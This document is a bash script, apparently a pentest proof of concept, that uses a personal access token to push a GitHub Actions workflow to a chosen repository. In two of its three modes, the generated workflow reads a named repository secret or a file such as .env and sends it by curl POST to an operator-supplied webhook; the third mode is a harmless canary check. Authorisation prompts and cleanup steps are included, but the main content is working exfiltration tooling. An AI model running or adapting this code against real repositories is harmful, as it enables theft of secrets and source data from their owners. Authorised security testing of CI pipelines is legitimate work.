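#!/bin/bash
#
# multi-script.sh — GitHub Actions secrets-exposure PoC for authorised engagements.
#
# Purpose: demonstrate that a user holding a PAT with push access to a repository
# can run a workflow on a pushed branch that reads repository secrets or files.
# Three modes are offered: a non-exfiltrating canary check (creates an issue in
# the target repository if a canary secret is readable), secret exfiltration to
# a webhook, and file exfiltration to a webhook.
#
# ONLY use this against repositories you are explicitly authorised to test.
# The exploit modes send repository data to the webhook URL you supply.
#
# Requirements: bash 4+, git, gh (GitHub CLI). Reads a PAT interactively on stdin.
# Side effects: logs gh in with the PAT, creates a branch `pentest-run-<epoch>`
# with `.github/workflows/pentest.yml` on the target, triggers a workflow run.
#
# Changes vs. the earlier revision:
#   - the PAT is read silently and is never written into the clone URL
#     (it used to end up in plain text in .git/config); git auths via
#     `gh auth git-credential` instead;
#   - the safe/canary workflow now sets GH_TOKEN/GH_REPO and `issues: write`,
#     without which `gh issue create` cannot run inside Actions;
#   - the run-id lookup retries instead of racing the push and watching "null";
#   - operator inputs are validated before being interpolated into YAML/shell;
#   - optional cleanup of the remote branch and local clone at the end.
set -euo pipefail

GREEN='\033[0;32m'
RED='\033[0;31m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

# Print a message and abort. Diagnostics go to stderr.
die() { printf '%b\n' "${RED}[!] $*${NC}" >&2; exit 1; }

for tool in gh git; do
  command -v "$tool" >/dev/null 2>&1 || die "required tool '$tool' is not installed"
done

# --- PHASE 0: SETUP & MODE SELECTION ---
printf '%b\n' "${CYAN}### Advanced GitHub Actions Security Toolkit (v2) ###${NC}"
printf '%b\n' "${RED}WARNING: Read The Docs for usage.${NC}"
printf '%s\n' "Please select an operation mode:"
PS3="Enter your choice: "
EXPLOIT_MODE=""
select MODE in "Safe Test (Canary Check)" "Exploit (Exfiltrate Repo Secret)" "Exploit (Exfiltrate File Content)"; do
  case "$MODE" in
    "Safe Test (Canary Check)") EXPLOIT_MODE="safe"; break ;;
    "Exploit (Exfiltrate Repo Secret)") EXPLOIT_MODE="secret"; break ;;
    "Exploit (Exfiltrate File Content)") EXPLOIT_MODE="file"; break ;;
    *) printf '%s\n' "Invalid selection." ;;
  esac
done

# -s: do not echo the PAT to the terminal / scrollback. The token only goes to
# gh over stdin; it is never placed in argv or in any URL.
read -rsp "Enter your GitHub Personal Access Token (PAT): " GITHUB_TOKEN
printf '\n'
[[ -n "$GITHUB_TOKEN" ]] || die "no token entered"
gh auth login --with-token <<< "$GITHUB_TOKEN" || die "gh auth login failed"
# gh now holds the credential; drop our copy so nothing downstream can leak it.
unset GITHUB_TOKEN
clear

# --- PHASE 1: TARGET DISCOVERY ---
printf '%s\n' "[*] Discovering accessible repositories..."
PS3="Please select a repository to target: "
mapfile -t REPOS < <(gh repo list --limit 200 --json nameWithOwner -q '.[].nameWithOwner')
[[ ${#REPOS[@]} -gt 0 ]] || die "no repositories visible to this token"
TARGET_REPO=""
select REPO in "${REPOS[@]}"; do
  if [[ -n "$REPO" ]]; then
    TARGET_REPO="$REPO"
    break
  fi
  printf '%s\n' "Invalid selection."
done
printf '\n%b\n' "[*] Targeting repository: ${YELLOW}$TARGET_REPO${NC}"

# Explicit authorisation gate: the exploit modes move client data off-platform.
read -rp "Type the repository name ('$TARGET_REPO') to confirm you are authorised to test it: " CONFIRM
[[ "$CONFIRM" == "$TARGET_REPO" ]] || die "confirmation did not match; aborting"

# --- PHASE 2: PAYLOAD CONFIGURATION ---
POC_BRANCH="pentest-run-$(date +%s)"
WEBHOOK_URL=""
SECRET_TO_STEAL=""
FILE_TO_STEAL=""
CANARY_SECRET_NAME=""

# Require https so exfiltrated client data is not sent in cleartext.
read_webhook_url() {
  read -rp "Enter your webhook URL for exfiltration: " WEBHOOK_URL
  [[ "$WEBHOOK_URL" =~ ^https://[^[:space:]\"]+$ ]] \
    || die "webhook URL must be an https:// URL with no spaces or quotes"
}

case "$EXPLOIT_MODE" in
  "secret")
    printf '\n%b\n' "${RED}### CONFIGURE SECRET EXFILTRATION ###${NC}"
    read -rp "Enter the exact name of the repository secret to exfiltrate: " SECRET_TO_STEAL
    # The name is interpolated into a `${{ secrets.NAME }}` expression; anything
    # outside this character set would just break the workflow YAML.
    [[ "$SECRET_TO_STEAL" =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] \
      || die "secret name must match ^[A-Za-z_][A-Za-z0-9_]*$"
    read_webhook_url
    ;;
  "file")
    printf '\n%b\n' "${RED}### CONFIGURE FILE EXFILTRATION ###${NC}"
    read -rp "Enter the full path of the file to exfiltrate (e.g., .env): " FILE_TO_STEAL
    # The path is interpolated into a double-quoted shell string inside the
    # workflow; reject characters that would escape that quoting.
    [[ -n "$FILE_TO_STEAL" && "$FILE_TO_STEAL" != *[\"\$\`\\]* ]] \
      || die "file path must be non-empty and must not contain \" \$ \` or \\"
    read_webhook_url
    ;;
  "safe")
    printf '\n%b\n' "${YELLOW}### CONFIGURE SAFE TEST ###${NC}"
    CANARY_SECRET_NAME="PENTEST_CANARY_$(date +%s)"
    printf '%s\n' "Go to '$TARGET_REPO' settings and create the following secret:"
    printf '%b\n' "Secret Name: ${CYAN}$CANARY_SECRET_NAME${NC}"
    printf '%b\n' "Secret Value: ${CYAN}safe-test-successful${NC}"
    read -rp "Press [Enter] once the secret is created..."
    ;;
  *)
    die "no operation mode selected"
    ;;
esac

# --- PHASE 3: EXECUTION ---
REPO_URL="https://github.com/$TARGET_REPO.git"
CLONE_DIR="${TARGET_REPO##*/}"
[[ -e "$CLONE_DIR" ]] && die "'$CLONE_DIR' already exists in $(pwd); remove it or run from another directory"

printf '%s\n' "[*] Cloning repository (git authenticates through gh; no token in the URL)..."
# Empty credential.helper first resets any globally configured helper so a
# different GitHub identity on this machine cannot be picked up by accident;
# the repo-local helper is then the only one git consults for clone and push.
git clone \
  -c credential.helper= \
  -c credential.helper='!gh auth git-credential' \
  "$REPO_URL" "$CLONE_DIR"
cd "$CLONE_DIR"
git checkout -b "$POC_BRANCH"
mkdir -p .github/workflows

YAML_CONTENT=""
if [[ "$EXPLOIT_MODE" == "secret" ]]; then
  # `\${{` / `\$` are escaped so they survive into the workflow instead of
  # being expanded by this shell.
  YAML_CONTENT=$(cat <<EOF
name: Secret Exploit Payload
on:
  push:
    branches:
      - "$POC_BRANCH"
jobs:
  exfil_secret:
    runs-on: ubuntu-latest
    steps:
      - name: "Exfiltrate secret: $SECRET_TO_STEAL"
        env:
          STOLEN_SECRET: \${{ secrets.$SECRET_TO_STEAL }}
        run: |
          curl -X POST -H "Content-Type: application/json" --data "{\\"value\\":\\"\$STOLEN_SECRET\\"}" "$WEBHOOK_URL"
EOF
)
elif [[ "$EXPLOIT_MODE" == "file" ]]; then
  YAML_CONTENT=$(cat <<EOF
name: File Exfiltration Payload
on:
  push:
    branches:
      - "$POC_BRANCH"
jobs:
  exfil_file:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code
        uses: actions/checkout@v4
      - name: "Exfiltrate file: $FILE_TO_STEAL"
        run: |
          if [ -f "$FILE_TO_STEAL" ]; then
            ENCODED_CONTENT=\$(base64 -w 0 "$FILE_TO_STEAL")
            curl -X POST -H "Content-Type: application/json" --data "{\\"file_path\\":\\"$FILE_TO_STEAL\\",\\"content_base64\\":\\"\$ENCODED_CONTENT\\"}" "$WEBHOOK_URL"
          else
            curl -X POST -H "Content-Type: application/json" --data "{\\"error\\":\\"File not found: $FILE_TO_STEAL\\"}" "$WEBHOOK_URL"
          fi
EOF
)
else # Safe mode
  # gh inside Actions needs GH_TOKEN to authenticate and GH_REPO (no checkout
  # step here) to know which repository to open the issue in; the job also
  # needs the `issues: write` permission on the workflow token.
  YAML_CONTENT=$(cat <<EOF
name: Safe Pentest PoC
on:
  push:
    branches:
      - "$POC_BRANCH"
permissions:
  issues: write
jobs:
  canary_test:
    runs-on: ubuntu-latest
    steps:
      - name: "Test Canary Secret"
        env:
          CANARY: \${{ secrets.$CANARY_SECRET_NAME }}
          GH_TOKEN: \${{ github.token }}
          GH_REPO: \${{ github.repository }}
        run: |
          if [ -n "\$CANARY" ]; then
            gh issue create --title "PoC SUCCESS: Secret Accessible" --body "Safe canary secret '$CANARY_SECRET_NAME' was read from branch: $POC_BRANCH"
          fi
EOF
)
fi
printf '%s\n' "$YAML_CONTENT" > .github/workflows/pentest.yml

printf '%s\n' "[*] Pushing payload to trigger workflow..."
git add .github/workflows/pentest.yml
git commit -m "Run security test"
git push --set-upstream origin "$POC_BRANCH"

printf '%s\n' "[*] Monitoring workflow run... Please wait."
# The run is not listable immediately after the push; poll for up to ~60 s.
# `-q '.[0].databaseId'` yields the literal string "null" on an empty list.
RUN_ID=""
for ((attempt = 1; attempt <= 12; attempt++)); do
  RUN_ID=$(gh run list --branch "$POC_BRANCH" --limit 1 --json databaseId -q '.[0].databaseId' || true)
  if [[ -n "$RUN_ID" && "$RUN_ID" != "null" ]]; then
    break
  fi
  RUN_ID=""
  sleep 5
done
[[ -n "$RUN_ID" ]] || die "no workflow run appeared for branch '$POC_BRANCH' (Actions disabled or workflows blocked on this repo?)"

if gh run watch "$RUN_ID" --exit-status; then
  printf '\n%b\n' "${GREEN}✅ PAYLOAD SENT!${NC} The workflow has been triggered."
else
  printf '\n%b\n' "${YELLOW}[!] Workflow run $RUN_ID finished with a non-success status; inspect it with: gh run view $RUN_ID --log${NC}"
fi
if [[ "$EXPLOIT_MODE" != "safe" ]]; then
  printf '%b\n' "Check your webhook for the results: ${YELLOW}$WEBHOOK_URL${NC}"
fi

# --- PHASE 4: CLEANUP (optional) ---
# The PoC branch and workflow file remain on the target until removed.
read -rp "Delete remote branch '$POC_BRANCH' and the local clone now? [y/N] " CLEANUP
if [[ "$CLEANUP" =~ ^[Yy]$ ]]; then
  git push origin --delete "$POC_BRANCH"
  cd ..
  rm -rf -- "${CLONE_DIR:?}"
  printf '%s\n' "[*] Branch and local clone removed."
else
  printf '%s\n' "[*] Leaving branch '$POC_BRANCH' in place; delete it and the canary secret when the engagement is closed out."
fi
printf '%b\n' "${YELLOW}[*] Reminder: revoke the PAT used for this run when it is no longer needed (gh auth logout).${NC}"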